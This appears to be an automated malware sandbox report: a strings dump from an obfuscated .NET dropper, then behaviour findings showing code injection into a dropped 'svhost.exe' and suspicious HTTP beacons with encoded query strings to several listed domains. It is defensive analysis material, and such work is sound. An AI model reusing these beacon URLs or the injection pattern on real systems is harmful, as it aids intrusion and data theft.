w d/w
!lit
9$&
A ah
G1tB
\'[*X
| mEW
DelegateAsyncResult
GT2t&#
1u] b
I^mI
- E|
YnT\
3Pv$
%YRx
I5jMl
4+dj
y4y]
kgBOL!
l7Rbv
(( H
3_[@C6Aw
L 5D
@,.&2
ConditionalCompareObjectEqual
cF&
Kgou
iFe"
i6 M
~^?S
31X=
^g&
2gl
e/{^
STrx;H
String
9[0C
cUUN
_CorExeMain
KJZx
c #}
|)!W
g3P1
.^wF
P 6%
!)Kg4
pkbC
\+\-h
7{E
set_Key
{s.P
: ?z
"fujR
6"*6
c9w
X:p6E
t+XSd
DM//T
,R5B
kc>B%#
g::O
2I.1+
jLKD
M995
@jt
#e]m
oaWX
b~c
FileLoadException
`y&$K
9[>g
1N})'
Y| <d
Microsoft.VisualBasic.CompilerServices
Lm2
<VJC*Q5
Is}|
" W2
pa3{gDI
lY!R*
.a\S
JVo#
mrOp
%4,BP
5| T
EditorBrowsableAttribute
O *[
c9.
Jp)>
P:C3
1W^Q
1{i^
f{+&
+F..(
RL'l
4E%
2J]&
d2/%
<pHK
nu9(l
&hg6n
rJxL
{0e%
(?VY
0WBO
JR,F
Load
B*PZ
?[Y&
4f
5'7bje
NMJ)Q
Attribute
`Ywyn
2~!{L
NC/LYM
ldRbt
/]B/
bqY/
VB
fDxO
R6~6
lE s0u
=5o3
FrX!
EO5b)R
Dictionary`2
BeginInvoke
_Kf}
!&,u
?InK
j1OsWN?
am,
rKmp
$>k
get_OSVersion
S;{qR
YvC=
MjV5Q
N5y%9
}B
EO#C
-wQEx
b_+
A|j+{
Mm!rm
4zG^
7&]gS
pJ&p
DirectoryInfo
y[z,
Am7j
j;^-
!~D&
At>J
RuntimeHelpers
Njj% +
LW'n@
~`E
,K&+2
qoQE
D )Z
>wHF]6x.D
iUE0$6
get_Platform
.YBN
.kV'
f[H
ce%C
0f&KQ
Op;
Lbu&'+C
L [
N&gr#~
?
/ |l
gDXq)
-b&&&&&
u}X|
J7`5
Ci &
K%#j
i<\8
Object
Kochq
oef/
JExB
U0v&"
{E1 ;
p`$^
_Z.T J
ndt7
BadImageFormatException
"lr_Y
gs :S
0a!A
b)i\
(b8=
(R z
\9A
iG/R bF
-b8=
;Vw\,
#-D:
_"d
O_Pg
HR6
/0#H.
e6W
rMNL
gfe;I
AttributeTargets
rvOD
EditorBrowsableState
(`&_
l+o1
/Jl{
|kHx
[htI
Gi4[
QfmP
1.0.0.0
tW}b
z,]"
^{?+
x`xJP9
DM+|
Kqx'
Wq"z
60Fi7e
L+W&
QG+l
_(j
mw[3
}ga(
Stream
<6s?4
get_Modules
_h Q
UH9?
!5IM
lJmwW
kQ*r
IsNullOrEmpty
~4 <i,
F<KQ
aNy}o
jgDI
PM@`
Y1<q
=TUlH
_yeX
klSq<[
0UY
Exit
CompilationRelaxationsAttribute
x6Wz
bHqk
wti)
nO6b!
i BT
[+12
$E"1
aR7j
=ctJw
`{_d
FOm:
_caHE8
EF7W
V%4%o
#m i
A"W<
%>hr
cuu6
$5y Ph
r-nu7{u
#oc&
2 nO@
]biR
O 0=
{;(Q
kkc&9vd
zwiYMT
U<Pd
;L 5
id6~r
`6Gov
assemblyFullName
FormatException
1nd*
OperatingSystem
-[lfom$
-GE;9
H#<G
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
f*~
Gp"E/Cd
System.ComponentModel
xMj?
nw3p
&5oS
tx?QT0UL
X(Z
$@aT
?e,k
$}Z{
P/i_
R$&?
System.Threading
^V^KT
w3 0'
JIo_5
a7HL
xxi2{
{/cz,
[%(--`
G}k[
dP;R
g=6WnY
e] (.y
/]Cs
w I-i
.wXz
LgPt
=MlC
;$w]N
XF [xI
{gS1
pj2<5
LsEN
o]Xw
C\H,
]"?j
`1,t
/UJbIx
[nO
pm06
Buffer
get_Current
`X_N
eCCAK
YA:[
M*hh~
"s,
zC.E
c` M
k U;=
YG1
fU,}b
1?k!P|
]LF#
f5j6
1&K'
`N;v
+ O!
,HI55
Y=Ia
"fuq
/"]f
Qt{s
q|zS
\==Y
!jYB|
]V{d
:5y7
0lI
R9[}c
&- Qt"
pnZY
p-l*
uQ9?
9<C}
{ &6
h&{N
A= x
Ee.Z)
S"zQa
Hw5 |
9D/Q7
2UTI
XZt#
GY\k(
|p
_8Ipd
(J+_
oq#C:
=Yo
pf%d
*/u`
KillOnExit
9YQ\#
FIGD
}i)]B
get_Ticks
\|K`b
'LV z
~3^Y
d@o^
K5A:;
ke mt:=A,
N 2n
)B[E%
4] I@5xk:"
N '@`
%,92
hx+l
?K.$
^XRkh
~V&M
v2.0.50727
1h=e8
s3C
9M-
{=WMR
RK D
3VE{
!'UE
0YeP
2Rnn
~5:
^6&a^
set_Item
O,Vh
MC>m_8
t3,a8
4P;]
%WMClA+vq
ehjf
l~ pbrv,
9'c
7G<
^ISf
;$Qd
>xmj
vyx
\3C./
m;g
:.A>
`S'g*h`
F@q,
i?W+
~kwp_CA
W`q_
Exception
PN0Y
^QyH
DC I
-Wg>*
QDFCMmMzRDRlNUY2ZzdIOA==
<+!z
j*r=
ut5FZ
<r#O
get_ASCII
UP2;
v)@%DT
>M
eN6>tK
hVn&
c7k-sv
S[mK
YYxu|
MEm#
} ^'
<`*O
GetTypeFromHandle
IAsyncResult
s'H.
zGR?
#Q.S
"4<Sj#
GetEnumerator
gc5M
SymmetricAlgorithm
Z&!B
7xW\
7O>V
4d[K
QH!5]
nT\
GetDelegateForFunctionPointer
eiBj
,$_X
puJI
Int16
FfiKP
{KTnn
0r<g
ckdjY
CR@L
M?!=
A I
|gh:
#HUh
? AzI*
[|yk
Enter
sB3x
NUghWr
kg+R
e$kjx
YFQmQ
\tGT
u/t[
E NB
GetProcessById
Sr>k
%vQo
^C4<dN
\QDZ
^P48
7z`0
ConcatenateObject
DrzI
System.Runtime.InteropServices
AhN=
2]C7
OAld
Hd1R
~le+
D0Vy
Math
-D(Z
]x\pj
.9Pv
]OU8
+&++{
|xfl
v}$Z
6/=(O
>1Jy
&D:)
@FuH*}@
Qdy~n
e+787
handle
.Fw8
"|Bf
nu$
;0O<E
1Ix(P
System.Runtime.CompilerServices
;!5^
4!*
3//2
huKwyKm0
A)jU
#x$1lLCb
EpZb: J
l1y%
hP(B
$BjS
8BkEzQy
=Tv
ygk2mlf
5@xdl
fd-%
/6N j
xjcs_
{E+a
vQ11D
Z4Vw
?0*B
SL0l
6f@
TransformFinalBlock
?sMG
YzB;
n~(Hf
*Ry
;}o@
ta!q
5g$uz
VI4R
!G+
XeJr
r@;y
Close
. [
F; *|
IDisposable
Gmo4
Synchronized
kam_
)\js
F\:m9
`fj(k
&u]3v=
!3g1-
frdY`Qlw\
d&IO C
^9U
Q8DW
5u{6
YM Mom#
V"M l
DRP
set_Mode
fX.G(
0^h
|&Ao
*2*C
I_nKQ
96_qv
cx*{%~
g&1;p
\].X~
j\1w
<Module>
kBQ3
ydpM
H"N
h|!i
lQc5,
X[Z!
@[!R
MulticastDelegate
{)9A
k706
LLw3
ComputeHash
-#s\%]
pWC+
kO>
6>~6
4Ae"o
c@s+
/V29
,|r4
ex*J
9zh%
'XE{a
wLDl
o4iJDcE;
A?Nt
-"7y"`9m
add_Idle
~q Gj
DciDY
2Gl~
lHlu
pu>]
CreateEncryptor
,R(tH+
%@RW7
`IAQ
cBoK
,k\
LtMEn
w}
d% {
Ba v
"m7A
W2%S}T
>{#+|
$9pr
E|qb
EB}R
Ct<YE
AN'm
7Ww
`gxQw
YEn9
*tHr
>_ec
rP*W
d8sU
,P2`
Oog
ApplicationSettingsBase
e$%F.Y
{qdp
L4xRB
3#6DK|u
4i >Y
ArgumentOutOfRangeException
E E<
Mowa
"E?(
42.Q%[
>>_=
yk9'
{c7N
r#m_v
r[}:n
g)fK)
c}an
w?b8zS
EventHandler
N+]#*
Thread
A-Z
?i!_
Collect
{v{{aH
`LwoC
a$14
'{Kok
1wBo
X{An
jj>&
Encoding
#$mp
"Y+h
GE7~
J/m
get_CurrentThread
*EkF
Av-n
6K=<
2PS8
=l]`
smcz
wk{{
9s)X8p
get_Module
3F9+
j4 i
/'X#
fsdgsrxd.My
e9 :
DwH>
L)mD
[Zyi
[._N
Zr|7
1y~(
d4Q!
PD>"GV
x#=i
t +sf
^cuji
4JQ|
:q; q
i'H;
OC7E
~Z1~
s$GX
gP(%6n^
#dVo
gcxd
OTNc
[xX?]
U0hBMQ==
x(R W
m2{x
|'!'
\Y`
t#J\
Zero
yMt!f
|<s>
G!d9
=RHs
I3RoZW53Zm9sIw==
F>bN5B
3 !qu
;7YH
jDgN
%.Py
6fTPO
f\6V
SOaj
zE0?
dB\o
e{^>b
|. |
b<uF
hn^(@n
@$X/9)
Cr.,
YC^N}}
L*nVN
u#g|L
2&SG
qzpC.
+<+A+F (L
x3ve&
System.Collections.Generic
sPfo
fU[n
G{~y
EyQ,]*
`2n
e!*#
n"EY
L8V|9
F7A3
j>1'
System.Windows.Forms
w9}[]
zm[cUdN2
7$nx
@[mp.'
2ns"Eq*
OK#p
].BU#t
d8ly
Qn(<(
t=vxH
:hKW
A\:n
get_ModuleName
%-(/
$] i
CHG9
BQ-Rg
Y|tE
fBhEq
bv}*
-d&&&&&
,YM
GeneratedCodeAttribute
^!#1
4,?.x
.4 Y
w!;/
3Jf>n\
(B7[
F 2T
TC+
-B~3
M"$l
7>M)^
((M7+
nF"[4l
B{[s
Sleep
Lt[v^
e~|&S
-AX
T5k/
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven04b_64 | Seven04b_64 | VirtualBox | 2018-07-09 23:04:14 | 2018-07-09 23:07:06 | 172 |
6 Behaviors detected by system signatures
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: i1.exe(2376) -> svhost.exe(2536)
Creates RWX memory
Severity: Medium
Confidence: Medium
Network activity was detected but is not reflected in the monitored API logs
Severity: Medium
Confidence: Very High
HTTP traffic contains suspicious features that may indicate malware-related traffic
Severity: Medium
Confidence: Low
- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
- suspicious_request: http://www.plodameg.com/wo/?_ZLL96=GcXdlIa6ZxlqRbZegdKsNXkvbBeiEnvqHFxsuUIxgQvlLphwtCbkHoPUJWL31ZKs2L7IxmKC&GzuD=WBjTZrcXj
- suspicious_request: http://www.alexander-international.com/wo/?_ZLL96=P1GwTOxNZA38J/ty9S5FskuZ18tjN2dwSBOS9pFPubeNqfHReGsJZQWznW45HPxeFtCDSRf0&GzuD=WBjTZrcXj
- suspicious_request: http://www.alexander-international.com/wo/
- suspicious_request: http://www.ipducks.com/wo/?_ZLL96=BmONLxxZHLtt6vXOLyHcOkXnIvM0pG6jXWO82HH9Q91vB3kvQ1F/r100Oe9lPOEOlw/K7kba&GzuD=WBjTZrcXj
- suspicious_request: http://www.ipducks.com/wo/
- suspicious_request: http://www.employeevita.com/wo/?_ZLL96=9i209dyIyU9F20iTxpg1zH/IiUX0PjkcVL2t2gvEXPLkT8PW7wISloIb9cUcaBh89qBzU09+&GzuD=WBjTZrcXj
- suspicious_request: http://www.employeevita.com/wo/
- suspicious_request: http://www.pq-db.info/wo/?_ZLL96=Odgi7Y7XPUYPi+s4cd6Y2J1SxIGI1CpSP1KZdAnTJe7ElOkUKQuUU5kS6GzKFYQs888Fg/mc&GzuD=WBjTZrcXj
- suspicious_request: http://www.pq-db.info/wo/
- suspicious_request: http://www.cnweikang.com/wo/?_ZLL96=O6MuYhT6wceiJ/j+9B9XHSKAaAuNOatlCnfAnNkQptIS5zQpIKNEDDuwDnZwxrX/qeVVNQr3&GzuD=WBjTZrcXj
- suspicious_request: http://www.cnweikang.com/wo/
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://www.plodameg.com/wo/?_ZLL96=GcXdlIa6ZxlqRbZegdKsNXkvbBeiEnvqHFxsuUIxgQvlLphwtCbkHoPUJWL31ZKs2L7IxmKC&GzuD=WBjTZrcXj
- url: http://www.alexander-international.com/wo/?_ZLL96=P1GwTOxNZA38J/ty9S5FskuZ18tjN2dwSBOS9pFPubeNqfHReGsJZQWznW45HPxeFtCDSRf0&GzuD=WBjTZrcXj
- url: http://www.alexander-international.com/wo/
- url: http://www.ipducks.com/wo/?_ZLL96=BmONLxxZHLtt6vXOLyHcOkXnIvM0pG6jXWO82HH9Q91vB3kvQ1F/r100Oe9lPOEOlw/K7kba&GzuD=WBjTZrcXj
- url: http://www.ipducks.com/wo/
- url: http://www.employeevita.com/wo/?_ZLL96=9i209dyIyU9F20iTxpg1zH/IiUX0PjkcVL2t2gvEXPLkT8PW7wISloIb9cUcaBh89qBzU09+&GzuD=WBjTZrcXj
- url: http://www.employeevita.com/wo/
- url: http://www.pq-db.info/wo/?_ZLL96=Odgi7Y7XPUYPi+s4cd6Y2J1SxIGI1CpSP1KZdAnTJe7ElOkUKQuUU5kS6GzKFYQs888Fg/mc&GzuD=WBjTZrcXj
- url: http://www.pq-db.info/wo/
- url: http://www.cnweikang.com/wo/?_ZLL96=O6MuYhT6wceiJ/j+9B9XHSKAaAuNOatlCnfAnNkQptIS5zQpIKNEDDuwDnZwxrX/qeVVNQr3&GzuD=WBjTZrcXj
- url: http://www.cnweikang.com/wo/
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 7.89, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00030c00, virtual_size: 0x00030bc1
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven04b_64 | Seven04b_64 | VirtualBox | 2018-07-09 23:04:14 | 2018-07-09 23:07:06 | 172 |
9 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\i1.exe.config C:\Users\Seven01\AppData\Local\Temp\i1.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Users\Seven01\AppData\Local\Temp\i1.exe.Local\ C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows C:\Windows\winsxs C:\Windows\Microsoft.NET\Framework\v4.0.30319 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security 
Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll \Device\KsecDD C:\Users\Seven01\AppData\Local\Temp\i1.config C:\Users\Seven01\AppData\Local\Temp\i1.INI C:\Windows\System32\l_intl.nls C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol23.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI C:\Windows\System32\tzres.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.INI C:\Windows\Globalization\it-it.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Windows\Globalization\en-us.nlp C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\Globalization\it.nlp C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ntdll.dll C:\Windows\assembly\GAC_32\d3.resources\0.0.0.0_it-IT_96cbd02afd56cf46 C:\Windows\assembly\GAC_MSIL\d3.resources\0.0.0.0_it-IT_96cbd02afd56cf46 C:\Windows\assembly\GAC\d3.resources\0.0.0.0_it-IT_96cbd02afd56cf46 C:\Users\Seven01\AppData\Local\Temp\it-IT\d3.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\d3.resources\d3.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\d3.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\d3.resources\d3.resources.exe C:\Windows\assembly\GAC_32\d3.resources\0.0.0.0_it_96cbd02afd56cf46 C:\Windows\assembly\GAC_MSIL\d3.resources\0.0.0.0_it_96cbd02afd56cf46 C:\Windows\assembly\GAC\d3.resources\0.0.0.0_it_96cbd02afd56cf46 C:\Users\Seven01\AppData\Local\Temp\it\d3.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\d3.resources\d3.resources.dll 
C:\Users\Seven01\AppData\Local\Temp\it\d3.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\d3.resources\d3.resources.exe C:\Users\Seven01\AppData\Local\Temp\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}.dll C:\Users\Seven01\AppData\Local\Temp\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}.dll C:\Users\Seven01\AppData\Local\Temp\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}.exe C:\Users\Seven01\AppData\Local\Temp\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}.exe C:\Windows\assembly C:\Windows\assembly\Desktop.ini C:\Windows\assembly\GAC_MSIL\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}\0.0.0.0__3e56350693f7355e C:\Users\Seven01\AppData\Local\Temp\svhost.exe C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll C:\Windows\assembly\GAC_32\System.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\System.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC\System.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Users\Seven01\AppData\Local\Temp\it-IT\System.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\System.resources\System.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\System.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\System.resources\System.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2376.25275359 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2376.25275359 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2376.25275390 C:\Windows\SysWOW64\ntdll.dll
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\i1.exe.config C:\Users\Seven01\AppData\Local\Temp\i1.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll \Device\KsecDD C:\Windows\System32\l_intl.nls C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol23.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\System32\tzres.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll 
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe C:\Windows\SysWOW64\ntdll.dll
Write Files
C:\Users\Seven01\AppData\Local\Temp\svhost.exe
Delete Files
C:\Users\Seven01\AppData\Local\Temp\svhost.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2376.25275359 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2376.25275359 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2376.25275390
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\i1.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion 
